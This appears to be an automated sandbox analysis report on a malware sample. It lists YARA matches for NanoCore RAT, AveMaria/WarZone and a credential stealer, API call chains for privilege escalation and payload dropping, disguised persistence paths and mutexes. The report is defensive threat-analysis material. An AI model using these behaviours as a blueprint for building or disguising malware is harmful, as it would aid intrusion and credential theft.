      Source: 40.2.KetqqsbuJ.exe.6cc0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6cc0000.36.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.2d3334c.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3fe9487.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.6c80000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.6c80000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.5280000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.5280000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
      Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.480758507.0000000003F8D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
      Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Xjf4yH9N2t.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: images.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: microC[1].exe.22.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: KetqqsbuJ.exe.22.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: dhcpmon.exe.40.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@27/18@11/2
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeCode function: 7_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xjf4yH9N2t.exe.logJump to behavior
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6a1c2465-7ac5-4f1d-acc5-ef04fcf454c9}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_01
      Source: Xjf4yH9N2t.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\ProgramData\images.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Xjf4yH9N2t.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
